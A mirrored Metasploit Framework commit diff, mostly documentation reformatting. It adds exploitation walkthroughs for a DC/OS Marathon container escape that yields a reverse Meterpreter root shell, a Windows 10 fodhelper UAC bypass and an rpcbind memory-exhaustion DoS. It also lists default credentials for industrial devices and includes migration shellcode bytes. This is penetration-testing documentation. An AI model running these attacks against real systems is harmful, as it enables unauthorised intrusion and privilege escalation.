github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

Update branch to include chances from upstream/master

Browse Source
This commit is contained in:
OJ 2017-06-09 17:18:57 +10:00
commit c4288fb35a
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
80 changed files with 1224 additions and 306 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
data/markdown_doc/auxiliary_scanner_template.erb
View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
Other examples of setting the RHSOTS option:
Other examples of setting the RHOSTS option:
Example 1:

4
documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md
View File

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output
## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
### 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > auxiliary/admin/chromecast/chromecast_youtube

2
documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md
View File

@ -27,7 +27,7 @@
7. You should get credentials
## Sample Output
## Scenarios
```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'

0
documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md Normal file
View File

29
documentation/modules/auxiliary/dos/rpc/rpcbomb.md Normal file
View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```

4
documentation/modules/auxiliary/gather/censys_search.md
View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7`
6: Do: `run`
## Sample Output
## Scenarios
#### Certificates Search
### Certificates Search
```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7

4
documentation/modules/auxiliary/scanner/ftp/anonymous.md
View File

@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous

3
documentation/modules/auxiliary/scanner/ftp/ftp_login.md
View File

@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org

4
documentation/modules/auxiliary/scanner/ftp/ftp_version.md
View File

@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version

13
documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md
View File

@ -1,4 +1,13 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts:
1. root/root
2. admin/1
3. alg/1
4. user/1
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump

4
documentation/modules/auxiliary/scanner/http/chromecast_webserver.md
View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_webserver

4
documentation/modules/auxiliary/scanner/http/chromecast_wifi.md
View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_wifi

3
documentation/modules/auxiliary/scanner/http/crawler.md
View File

@ -34,9 +34,10 @@ You can use any web application to test the crawler.
4. Do: ```set URI [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
```
msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1

9
documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md
View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to execute arbitrary system commands:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_cmd_exec

5
documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md
View File

@ -1,4 +1,5 @@
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
## Verification Steps
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_config

9
documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md
View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to dump system hashes:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_hashes

5
documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md
View File

@ -1,4 +1,5 @@
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
## Verification Steps
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_web_login

12
documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md
View File

@ -1,11 +1,13 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17.
* VMU-C EM prior to firmware Version A11_U05
* VMU-C PV prior to firmware Version A17.
## Verification Steps
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot

5
documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
View File

@ -1,4 +1,5 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin

3
documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md
View File

@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125

5
documentation/modules/auxiliary/scanner/http/owa_ews_login.md
View File

@ -1,4 +1,5 @@
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
It is typically faster than the traditional form-based OWA login method.
## Verification Steps
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
3. Set TARGETURI if necessary.
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(owa_ews_login) > run

3
documentation/modules/auxiliary/scanner/http/robots_txt.md
View File

@ -25,7 +25,8 @@ is extremely common.
You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/`
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238

2
documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md
View File

@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(cisco_ike_benigncertain) > show options

8
documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md
View File

@ -1,6 +1,8 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot

192
documentation/modules/exploit/linux/http/dcos_marathon.md Normal file
View File

@ -0,0 +1,192 @@
# Vulnerable Application
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS
## DCOS
This Exploit was tested with CentOS 7 as the host operating system for
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
Default 'custom' installation for on site premise setup. Only the Install
part of the DCOS guide was completed, the system hardening and securing
your cluster section where skipped. This is to represent a 'Default' install
with a system admin conducting hasty deployments taking no thought about security.
## To Setup Your Cluster
I recommend doing a 'on-premise'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
sudo groupadd nogroup && sudo reboot
```
Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
--add-repo \
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot
```
Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastly generate ssh rsa keys for authentication. And update the
/etc/ssh/sshd_config file to support root login.
```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```
Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
Login and get their current IP address.
* Note: I recommend giving them static IPs if you have further use for the cluster.
From here use another Linux machine with docker installed to finish
the installation process. I used an Ubuntu machine with docker installed.
Follow the custom CLI guide for creating the required files in
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/
Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`
Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://[master_ip]:8080/
You should see the Marathon UI web application.
# Exploitation
This module is designed for the attacker to leverage, creation of a
docker container with out authentication through the DCOS Marathon UI
to gain root access to the hosting server of the docker container
in the DCOS cluster.
## Options
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```

2
documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md
View File

@ -17,7 +17,7 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability,
3. Do: ```set URIPATH / [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
### IE 11 and Flash 18.0.0.194

4
documentation/modules/exploit/multi/http/axis2_deployer.md
View File

@ -17,7 +17,7 @@ The Apache Axis2 Web application has three main sections:'Services' lists all th
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/multi/http/axis2_deployer
@ -57,6 +57,4 @@ Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.10.155.37 - Meterpreter session 3 closed. Reason: User exit
```

2
documentation/modules/exploit/multi/http/glassfish_deployer.md
View File

@ -34,7 +34,7 @@ If you are on a different platform (such as Windows), the installation should be
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/multi/http/glassfish_deployer

5
documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md
View File

@ -1,6 +1,7 @@
## Vulnerable Application
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3.
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x.
A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3.
## Vulnerable Setup
@ -47,7 +48,7 @@ To set up the vulnerable environment, please do:
In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here.
## Sample Output
## Scenarios
### The Check command

7
documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md
View File

@ -1,6 +1,7 @@
## Description
This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.
This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x.
This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.
## Verification Steps
@ -13,8 +14,6 @@ cd taco
vim config/environments/development.rb
```
Add the following line just before the final `end` tag:
```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```
@ -38,7 +37,7 @@ sudo apt-get install nodejs
3. Do: ```set RPORT [Port]```
4. Do: ```run```
## Sample Output
## Scenarios
### Rails version 4.2.6

5
documentation/modules/exploit/windows/http/manageengine_connectionid_write.md
View File

@ -1,6 +1,7 @@
## Description
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 9, build 90109 and build 91084.
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
This exploit was successfully tested on version 9, build 90109 and build 91084.
**NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
@ -21,7 +22,7 @@ Desktop Central is integrated desktop and mobile device management software that
3. Do: ```check```
4. Do: ```run```
## Sample Output
## Scenarios
```
$ msfconsole

2
documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md
View File

@ -30,7 +30,7 @@
4. Do: `run`
5. You should get a session
## Sample Output
## Scenarios
```
msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec

2
documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md
View File

@ -21,7 +21,7 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte
3. Do: ```set PATH / [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/windows/iis/iis_webdav_upload_asp

91
documentation/modules/exploit/windows/local/bypassuac_fodhelper.md Normal file
View File

@ -0,0 +1,91 @@
## Intro
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
## Usage
You'll first need to obtain a session on the target system.
Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
and manually create a job handler corresponding to the payload.
##Scenario
```
msf >
[*] Sending stage (1189423 bytes) to 192.168.50.4
[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100
msf > sessions -i 11
[*] Starting interaction with 11...
meterpreter > shell
Process 9496 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\Users\sasha\Desktop>exit
exit
meterpreter >
Background session 11? [y/N]
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set SESSION 11
SESSION => 11
msf exploit(bypassuac_fodhelper) > show targets
Exploit targets:
Id Name
-- ----
0 Windows x86
1 Windows x64
msf exploit(bypassuac_fodhelper) > set target 0
target => 0
msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on 192.168.50.1:4445
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 192.168.50.4
[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100
[*] Cleaining up registry keys ...
meterpreter > shell
Process 4076 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
ERROR: Unable to get user claims information.
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\WINDOWS\system32>
```

2
documentation/modules/module_doc_template.md
View File

@ -27,6 +27,8 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
## Scenarios
### Version of software and OS as applicable
Specific demo of using the module that might be useful in a real world scenario.
```

3
external/source/shellcode/windows/x86/src/migrate/executex64.asm vendored
View File

@ -40,6 +40,9 @@ delta:
call go_all_native ; perform the transition into native x64 and return here when done.
mov ax, ds ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
mov ss, ax ; found and fixed by ReWolf, incorporated by RaMMicHaeL
add esp, (8+4+8) ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
pop edi ; restore the clobbered registers
pop esi ;

11
external/source/vncdll/vncdll/inject.c vendored
View File

@ -12,11 +12,14 @@
#endif
// see '/msf3/external/source/shellcode/x86/migrate/executex64.asm'
// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
// found and fixed by ReWolf, incorporated by RaMMicHaeL
BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00"
"\x58\x83\xC0\x25\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00"
"\x89\x02\xE8\x09\x00\x00\x00\x83\xC4\x14\x5F\x5E\x5D\xC2\x08\x00"
"\x8B\x3C\x24\xFF\x2A\x48\x31\xC0\x57\xFF\xD6\x5F\x50\xC7\x44\x24"
"\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C\x24";
"\x58\x83\xC0\x2B\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00"
"\x89\x02\xE8\x0F\x00\x00\x00\x66\x8C\xD8\x66\x8E\xD0\x83\xC4\x14"
"\x5F\x5E\x5D\xC2\x08\x00\x8B\x3C\xE4\xFF\x2A\x48\x31\xC0\x57\xFF"
"\xD6\x5F\x50\xC7\x44\x24\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C"
"\x24";
// see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm'
BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00"

2
lib/metasploit/framework/ntds/account.rb
View File

@ -137,7 +137,7 @@ module Metasploit
end
def get_string(data,length)
data.slice!(0,length).gsub(/\x00/,'')
data.slice!(0,length).force_encoding("UTF-8").gsub(/\x00/,'')
end
def uac_string

4
lib/metasploit/framework/ntds/parser.rb
View File

@ -50,11 +50,13 @@ module Metasploit
def pull_batch
if channel.cid.nil?
dlog("NTDS Parser Channel was closed, reopening")
reopen_channel
end
begin
raw_batch_data = channel.read(BATCH_SIZE)
rescue EOFError
rescue EOFError => e
